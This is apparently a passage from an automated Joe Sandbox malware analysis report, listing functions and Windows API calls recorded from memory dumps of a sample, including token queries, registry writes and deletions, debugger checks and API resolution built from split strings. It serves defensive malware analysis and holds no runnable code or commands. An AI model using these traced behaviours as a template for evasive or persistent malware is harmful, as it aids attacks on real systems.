GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD80
SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00401970,?), ref: 0040DD95
CloseHandle.KERNEL32(00000000), ref: 0040DD9C
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401970,?), ref: 0040DDA9
HeapFree.KERNEL32(00000000), ref: 0040DDB0

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00420824, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 148

APIs

GetModuleFileNameW.KERNEL32(00000000,00435AE2,00000104), ref: 004208C0

Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641

_wcslen.LIBCMT ref: 004208EF
_wcslen.LIBCMT ref: 004208FC

Part of subcall function 00424851: LoadLibraryW.KERNEL32(00434558), ref: 0042488C

GetStdHandle.KERNEL32(000000F4), ref: 00420972
_strlen.LIBCMT ref: 004209AF
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004209BE

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Strings

ZC, xrefs: 004208B3

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 00425296, Relevance: 12.2, APIs: 8, Instructions: 190

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000100,00000000,00000000,?,00000100,00000000,?,?,?,?,?,?,?), ref: 00425307
MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000100,?,00000000,?,00000100,00000000,?,?,?,?,?,?,?), ref: 00425375
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000100,00000000,?,?,?,?,?,?,?), ref: 00425391
LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,00000100,00000000,?,?,?,?,?,?,?), ref: 004253CA

Part of subcall function 0042BB4E: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00424C51,00000000,00000001,00000000,?,00423E3E,00000018,00435890,0000000C,00423ECE), ref: 0042BB93

LCMapStringW.KERNEL32(?,?,?,?,00000000,?,?,00000100,00000000,?,?,?,?,?,?,?), ref: 00425430
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000100,00000000,?,?,?,?), ref: 0042544F
__freea.LIBCMT ref: 00425459
__freea.LIBCMT ref: 00425462

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0042220E, Relevance: 12.1, APIs: 8, Instructions: 61

APIs

InterlockedDecrement.KERNEL32(?), ref: 00422228
InterlockedDecrement.KERNEL32(?), ref: 00422235
InterlockedDecrement.KERNEL32(?), ref: 00422242
InterlockedDecrement.KERNEL32(?), ref: 0042224F
InterlockedDecrement.KERNEL32(?), ref: 0042225C
InterlockedDecrement.KERNEL32(?), ref: 00422278
InterlockedDecrement.KERNEL32(00000000), ref: 00422288
InterlockedDecrement.KERNEL32(?), ref: 0042229E

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0042217F, Relevance: 12.1, APIs: 8, Instructions: 58

APIs

InterlockedIncrement.KERNEL32(00000000), ref: 00422191
InterlockedIncrement.KERNEL32(?), ref: 0042219E
InterlockedIncrement.KERNEL32(?), ref: 004221AB
InterlockedIncrement.KERNEL32(?), ref: 004221B8
InterlockedIncrement.KERNEL32(?), ref: 004221C5
InterlockedIncrement.KERNEL32(?), ref: 004221E1
InterlockedIncrement.KERNEL32(?), ref: 004221F1
InterlockedIncrement.KERNEL32(?), ref: 00422207

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0041F877, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 327

APIs

Part of subcall function 0041F3C3: __getptd.LIBCMT ref: 0041F3D6

__cftoe.LIBCMT ref: 0041F92E
_strrchr.LIBCMT ref: 0041F975
__alldvrm.INT64 ref: 0041FB73
__alldvrm.INT64 ref: 0041FB99
__alldvrm.INT64 ref: 0041FBBF

Strings

0, xrefs: 0041F890

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0041F877, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 327

APIs

Part of subcall function 0041F3C3: __getptd.LIBCMT ref: 0041F3D6

__cftoe.LIBCMT ref: 0041F92E
_strrchr.LIBCMT ref: 0041F975
__alldvrm.INT64 ref: 0041FB73
__alldvrm.INT64 ref: 0041FB99
__alldvrm.INT64 ref: 0041FBBF

Strings

0, xrefs: 0041F890

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 00421FC7, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116

APIs

__getptd.LIBCMT ref: 00421FD7

Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A

Part of subcall function 00421C80: __getptd.LIBCMT ref: 00421C8C
Part of subcall function 00421C80: __amsg_exit.LIBCMT ref: 00421CAC
Part of subcall function 00421C80: InterlockedDecrement.KERNEL32(?), ref: 00421CD9
Part of subcall function 00421C80: InterlockedIncrement.KERNEL32(00432C08), ref: 00421D04

Part of subcall function 00421D24: GetOEMCP.KERNEL32 ref: 00421D4D
Part of subcall function 00421D24: GetACP.KERNEL32 ref: 00421D70

Part of subcall function 00424C40: Sleep.KERNEL32(00000000,00000001,?,?,00423E3E,00000018,00435890,0000000C,00423ECE,?,?,?,00421317,0000000D,?,0042085F), ref: 00424C61

InterlockedDecrement.KERNEL32(?), ref: 0042203D

Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
Part of subcall function 00423EB3: RtlEnterCriticalSection.NTDLL(?), ref: 00423EDD

InterlockedDecrement.KERNEL32 ref: 004220F4

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3

Strings

'C, xrefs: 00422138
'C, xrefs: 00422103
'C, xrefs: 0042204A

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 0041ECC0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74

APIs

GetCurrentThread.KERNEL32 ref: 0041ED0A
GetEnvironmentStrings.KERNEL32 ref: 0041ED12
GetVersionExA.KERNEL32(?), ref: 0041ED6E
GetEnvironmentStrings.KERNEL32 ref: 0041ED74

Strings

x, xrefs: 0041ED83
}H, xrefs: 0041ED90

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0040E684, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 31

APIs

GetModuleHandleA.KERNEL32(?,?), ref: 0040E6BD
GetProcAddress.KERNEL32(00000000), ref: 0040E6C4

Strings

kern, xrefs: 0040E698
el32, xrefs: 0040E6A0
nfo, xrefs: 0040E6B6
.dll, xrefs: 0040E6A7

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00420100, Relevance: 9.3, APIs: 6, Instructions: 262

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 00420201
__FindPESection.LIBCMT ref: 0042021B
VirtualQuery.KERNEL32(?,8E198577,0000001C,8E198577,?,?,?,?,?,00421800,00435740,000000FE,?,0041F0F1,?), ref: 00420301
__FindPESection.LIBCMT ref: 00420350
_ValidateScopeTableHandlers.LIBCMT ref: 00420374

Part of subcall function 00420040: __FindPESection.LIBCMT ref: 00420083
Part of subcall function 00420040: __FindPESection.LIBCMT ref: 004200C1

__FindPESection.LIBCMT ref: 0042038E

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00420100, Relevance: 9.3, APIs: 6, Instructions: 262

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 00420201
__FindPESection.LIBCMT ref: 0042021B
VirtualQuery.KERNEL32(?,0043278C,0000001C,0043278C,?,?,?,?,?,00421800,00435740,000000FE,?,0041F0F1,?), ref: 00420301
__FindPESection.LIBCMT ref: 00420350
_ValidateScopeTableHandlers.LIBCMT ref: 00420374

Part of subcall function 00420040: __FindPESection.LIBCMT ref: 00420083
Part of subcall function 00420040: __FindPESection.LIBCMT ref: 004200C1

__FindPESection.LIBCMT ref: 0042038E

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 004033F3, Relevance: 9.1, APIs: 6, Instructions: 100

APIs

WSAStartup.WS2_32(00000201,?), ref: 00403419

Part of subcall function 00404521: GetModuleHandleW.KERNEL32(00000000,7142434B,001CFDA8,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 0040453A
Part of subcall function 00404521: GetCurrentProcess.KERNEL32(00000008,004019F5,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404546
Part of subcall function 00404521: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 0040454D
Part of subcall function 00404521: GetTokenInformation.ADVAPI32(004019F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,004019F5), ref: 00404570
Part of subcall function 00404521: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404572
Part of subcall function 00404521: GlobalAlloc.KERNEL32(00000040,76E6FE8D,?,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404587
Part of subcall function 00404521: GetTokenInformation.ADVAPI32(004019F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,004019F5), ref: 004045A7
Part of subcall function 00404521: ConvertSidToStringSidW.ADVAPI32(00000000,76AD46E9), ref: 004045B7
Part of subcall function 00404521: GetProcessHeap.KERNEL32(00000008,00000025), ref: 00404601
Part of subcall function 00404521: HeapAlloc.KERNEL32(00000000), ref: 00404608
Part of subcall function 00404521: GetCapture.USER32 ref: 00404617
Part of subcall function 00404521: StrCmpIW.SHLWAPI(00000000,76AD46E9), ref: 00404647
Part of subcall function 00404521: LocalFree.KERNEL32(76AD46E9), ref: 0040465B
Part of subcall function 00404521: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404664
Part of subcall function 00404521: HeapFree.KERNEL32(00000000), ref: 0040466B
Part of subcall function 00404521: GlobalFree.KERNEL32(00000000), ref: 00404675
Part of subcall function 00404521: CloseHandle.KERNEL32(004019F5), ref: 0040467F

SetEvent.KERNEL32 ref: 00403443
ExitThread.KERNEL32 ref: 0040344B

Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,00000208,0041CAA8), ref: 00403E3F
Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 00403E42
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,00000039,00020019), ref: 00403ED2
Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 00403ED9
Part of subcall function 00403E17: GetTickCount.KERNEL32 ref: 00403EED
Part of subcall function 00403E17: wsprintfW.USER32 ref: 00403F24
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00403F6E
Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 00403F71
Part of subcall function 00403E17: GetCaretBlinkTime.USER32 ref: 00403F86
Part of subcall function 00403E17: wsprintfW.USER32 ref: 00403FC8
Part of subcall function 00403E17: RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000003,00000000,?,00020019), ref: 0040401D
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,?), ref: 0040402C
Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 0040402F
Part of subcall function 00403E17: RegQueryValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00404051
Part of subcall function 00403E17: RegCloseKey.ADVAPI32(?), ref: 00404077
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,?), ref: 00404099
Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 0040409C
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 004040AE
Part of subcall function 00403E17: HeapReAlloc.KERNEL32(00000000), ref: 004040B1
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004040D5
Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 004040D8
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 004040E4
Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 004040ED
Part of subcall function 00403E17: RegCloseKey.ADVAPI32(?), ref: 004040FC
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,?), ref: 00404107
Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 0040410A
Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 00404112
Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 00404115

SetEvent.KERNEL32 ref: 00403486

Part of subcall function 00403199: GetProcessHeap.KERNEL32(00000008,00000029), ref: 00403209
Part of subcall function 00403199: HeapAlloc.KERNEL32(00000000), ref: 00403210
Part of subcall function 00403199: GetCapture.USER32 ref: 0040321F
Part of subcall function 00403199: Sleep.KERNEL32(-0000EA60), ref: 004032C2
Part of subcall function 00403199: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004032E9
Part of subcall function 00403199: HeapFree.KERNEL32(00000000), ref: 004032F0

Sleep.KERNEL32(-0000EA60), ref: 00403534

Part of subcall function 0040B9E6: GetProcessHeap.KERNEL32(00000008,0000000B,00000000), ref: 0040BA29
Part of subcall function 0040B9E6: HeapAlloc.KERNEL32(00000000), ref: 0040BA2C
Part of subcall function 0040B9E6: GetShellWindow.USER32 ref: 0040BA40
Part of subcall function 0040B9E6: GetProcessHeap.KERNEL32(00000008,00000011), ref: 0040BA9F
Part of subcall function 0040B9E6: HeapAlloc.KERNEL32(00000000), ref: 0040BAA2
Part of subcall function 0040B9E6: GetMessageTime.USER32 ref: 0040BAB6
Part of subcall function 0040B9E6: GetModuleHandleA.KERNEL32(?,00000000), ref: 0040BAE7
Part of subcall function 0040B9E6: GetProcAddress.KERNEL32(00000000), ref: 0040BAEE
Part of subcall function 0040B9E6: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BB23
Part of subcall function 0040B9E6: HeapFree.KERNEL32(00000000), ref: 0040BB2C
Part of subcall function 0040B9E6: GetProcessHeap.KERNEL32(00000000,?), ref: 0040BB31
Part of subcall function 0040B9E6: HeapFree.KERNEL32(00000000), ref: 0040BB34

Part of subcall function 00402915: Sleep.KERNEL32(00002710,?,00000000,?,?), ref: 00402938

Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000008,00000208,00000000), ref: 00403B01
Part of subcall function 00403ADC: HeapAlloc.KERNEL32(00000000), ref: 00403B04
Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000008,00000039,00020006), ref: 00403BC8
Part of subcall function 00403ADC: HeapAlloc.KERNEL32(00000000), ref: 00403BCB
Part of subcall function 00403ADC: GetTickCount.KERNEL32 ref: 00403BDF
Part of subcall function 00403ADC: wsprintfW.USER32 ref: 00403C16
Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00403C56
Part of subcall function 00403ADC: HeapAlloc.KERNEL32(00000000), ref: 00403C59
Part of subcall function 00403ADC: GetCaretBlinkTime.USER32 ref: 00403C6D
Part of subcall function 00403ADC: wsprintfW.USER32 ref: 00403CB2
Part of subcall function 00403ADC: RegDeleteValueW.ADVAPI32(?,?), ref: 00403CC5
Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403CD4
Part of subcall function 00403ADC: HeapFree.KERNEL32(00000000), ref: 00403CD7
Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00403D22
Part of subcall function 00403ADC: HeapAlloc.KERNEL32(00000000), ref: 00403D25
Part of subcall function 00403ADC: GetCaretBlinkTime.USER32 ref: 00403D39
Part of subcall function 00403ADC: wsprintfW.USER32 ref: 00403D7E
Part of subcall function 00403ADC: RegSetValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00403DAE
Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403DC6
Part of subcall function 00403ADC: HeapFree.KERNEL32(00000000), ref: 00403DC9
Part of subcall function 00403ADC: RegCloseKey.ADVAPI32(?), ref: 00403DEA
Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000000,?), ref: 00403DF5
Part of subcall function 00403ADC: HeapFree.KERNEL32(00000000), ref: 00403DF8
Part of subcall function 00403ADC: GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00403E04
Part of subcall function 00403ADC: HeapFree.KERNEL32(00000000), ref: 00403E07

Part of subcall function 00403300: lstrcpyA.KERNEL32(00000000,?), ref: 004033A1
Part of subcall function 00403300: lstrcpyA.KERNEL32(-00000020,00412000), ref: 004033AD

Part of subcall function 0040482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0040318E,00000000,?,00000000,0040D266,?,00000001,00000000,76E6C570,?,?,0040D266), ref: 00404845
Part of subcall function 0040482B: HeapFree.KERNEL32(00000000,?,0040D266), ref: 0040484C

SetEvent.KERNEL32 ref: 0040350D

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004077D7, Relevance: 9.1, APIs: 6, Instructions: 94

APIs

Part of subcall function 004086AF: GetProcessHeap.KERNEL32(00000008,00000208,00000000,?,00000000,004077F1,00000000,?), ref: 004086D1
Part of subcall function 004086AF: HeapAlloc.KERNEL32(00000000), ref: 004086D8
Part of subcall function 004086AF: GetModuleFileNameW.KERNEL32(00000104,00000000,00000104), ref: 004086EC
Part of subcall function 004086AF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040870B
Part of subcall function 004086AF: HeapFree.KERNEL32(00000000), ref: 0040870E
Part of subcall function 004086AF: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040871A
Part of subcall function 004086AF: HeapAlloc.KERNEL32(00000000), ref: 0040871D
Part of subcall function 004086AF: GetLastError.KERNEL32 ref: 0040873B
Part of subcall function 004086AF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408746
Part of subcall function 004086AF: HeapFree.KERNEL32(00000000), ref: 0040874D

Part of subcall function 00401B2B: lstrcmpA.KERNEL32(?,?), ref: 00401B77

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00407861
SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00408D00), ref: 00407876
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0040788E
CloseHandle.KERNEL32(00000000), ref: 004078A7

Part of subcall function 0040765B: GetProcessHeap.KERNEL32(00000008,0000001F,00000000,?,00000000), ref: 004076D7
Part of subcall function 0040765B: HeapAlloc.KERNEL32(00000000), ref: 004076DA
Part of subcall function 0040765B: GetProcessHeap.KERNEL32 ref: 004076EF
Part of subcall function 0040765B: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040773B
Part of subcall function 0040765B: HeapAlloc.KERNEL32(00000000), ref: 0040773E
Part of subcall function 0040765B: IsSystemResumeAutomatic.KERNEL32 ref: 00407752
Part of subcall function 0040765B: GetModuleHandleA.KERNEL32(00000000,?), ref: 00407783
Part of subcall function 0040765B: GetProcAddress.KERNEL32(00000000), ref: 0040778A
Part of subcall function 0040765B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040779E
Part of subcall function 0040765B: HeapFree.KERNEL32(00000000), ref: 004077A7
Part of subcall function 0040765B: GetProcessHeap.KERNEL32(00000000,?), ref: 004077AC
Part of subcall function 0040765B: HeapFree.KERNEL32(00000000), ref: 004077AF

GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000001,?,?,?,?,00408D00), ref: 004078C0
HeapFree.KERNEL32(00000000), ref: 004078C7

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040E60D, Relevance: 9.1, APIs: 6, Instructions: 54

APIs

lstrlenW.KERNEL32(?,00000000,00000000,?), ref: 0040E625
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?), ref: 0040E634
HeapAlloc.KERNEL32(00000000), ref: 0040E63B
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0040E654

Part of subcall function 0040E545: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,0040E667), ref: 0040E55F
Part of subcall function 0040E545: GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,?,0040E667), ref: 0040E58D
Part of subcall function 0040E545: HeapAlloc.KERNEL32(00000000,?,0040E667), ref: 0040E594
Part of subcall function 0040E545: GetProcessHeap.KERNEL32(00000000,00000000,?,0040E667), ref: 0040E5E9
Part of subcall function 0040E545: HeapFree.KERNEL32(00000000,?,0040E667), ref: 0040E5F0

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E66D
HeapFree.KERNEL32(00000000), ref: 0040E674

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040D97F, Relevance: 9.1, APIs: 6, Instructions: 51

APIs

ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,00000000,001CFDA8,001CFDA8,001CFDA8,001CFDA8,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D991
GetProcessHeap.KERNEL32(00000008,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0040D9AB
HeapAlloc.KERNEL32(00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9B2
ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,7142434B,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D9CD
GetProcessHeap.KERNEL32(00000000,00000000,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9DA
HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040D9E1

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00421C80, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47

APIs

__getptd.LIBCMT ref: 00421C8C

Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A

__amsg_exit.LIBCMT ref: 00421CAC

Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
Part of subcall function 00423EB3: EnterCriticalSection.KERNEL32(00000000,00000000,?,00421317,0000000D), ref: 00423EDD

InterlockedDecrement.KERNEL32(?), ref: 00421CD9

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00424BF3

InterlockedIncrement.KERNEL32(00182960), ref: 00421D04

Strings

'C, xrefs: 00421CE3

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00421C80, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47

APIs

__getptd.LIBCMT ref: 00421C8C

Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A

__amsg_exit.LIBCMT ref: 00421CAC

Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
